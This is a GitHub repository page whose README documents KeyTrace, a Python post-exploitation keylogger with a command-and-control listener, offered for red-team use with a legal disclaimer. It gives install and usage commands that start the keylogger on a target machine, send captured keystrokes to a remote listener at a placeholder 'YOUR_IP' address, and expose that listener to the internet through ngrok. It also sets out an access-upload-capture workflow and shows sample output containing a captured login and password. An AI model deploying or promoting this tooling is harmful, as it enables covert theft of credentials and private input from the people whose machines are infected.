Skip to content

DavidJara1998/KeyTrace

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
modules
modules
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
keytrace.py
keytrace.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

KeyTrace

Post-exploitation keylogger for authorized red team engagements and penetration testing demonstrations.

KeyTrace captures keystrokes on a compromised machine and exfiltrates them to a remote listener. Built to demonstrate post-exploitation impact during authorized penetration tests.

Features

  • Keystroke capture with active window tracking
  • Timestamps per session block
  • Local file logging
  • HTTP exfiltration to remote C2 listener
  • Multi-session listener with per-host log files
  • System metadata collection (hostname, user, IP, OS)
  • Cross-platform: Windows / Linux / macOS

Installation

git clone https://github.com/DavidJara1998/KeyTrace.git
cd KeyTrace
pip install -r requirements.txt

Usage

Step 1 — Start the listener (your machine)

python keytrace.py listen --port 8080

Output:

=== KEYTRACE LISTENER ===
[+] Listening on 0.0.0.0:8080
    Logs saved to: ./keytrace_logs/<hostname>_<user>.log
    Waiting for connections...

Step 2 — Start keylogger on target machine

# With C2 exfiltration
python keytrace.py start --server http://YOUR_IP:8080 --interval 30

# Local only (no network)
python keytrace.py start --log captured.log --interval 60

Step 3 — Read captured data

# Dump local log
python keytrace.py dump --log captured.log

# Remote logs are saved automatically to:
# ./keytrace_logs/<hostname>_<user>.log

Example Output (Listener)

=== KEYTRACE LISTENER ===
[+] Listening on 0.0.0.0:8080

[+] NEW SESSION: DESKTOP-ABC123 | user: john | ip: 192.168.1.105
14:23:01 DESKTOP-ABC123 (john) +342 chars → keytrace_logs/DESKTOP-ABC123_john.log
  [14:22:45] Window: Chrome - Gmail login ...admin@company.com[TAB]Password123[ENTER]

Commands Reference

start     Start keylogger on this machine
dump      Print contents of local log file
listen    Start C2 listener to receive logs from victims

start options:
  --log FILE       Log file path (default: keytrace.log)
  --interval SEC   Send interval in seconds (default: 30)
  --server URL     C2 listener URL

listen options:
  --port PORT      Listen port (default: 8080)
  --host HOST      Bind address (default: 0.0.0.0)

Red Team Workflow

1. Gain initial access to target machine
2. Upload keytrace.py + modules/ to target
3. Run: python keytrace.py start --server http://YOUR_IP:8080
4. Keystrokes stream to your listener in real time
5. Document captured credentials in pentest report

For LAN-only scenarios: use your local IP (192.168.x.x)
For internet targets: expose your listener via ngrok: ngrok http 8080

Legal Disclaimer

This tool is intended exclusively for authorized penetration testing and red team engagements. You must have explicit written permission from the system owner before deploying this tool. Unauthorized use is illegal under computer fraud laws in most jurisdictions. The author assumes no liability for misuse.

License

MIT License

About

Post-exploitation keylogger with C2 listener for authorized red team engagements

Topics

python cybersecurity educational post-exploitation ethical-hacking red-team c2 security-research authorized-testing

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages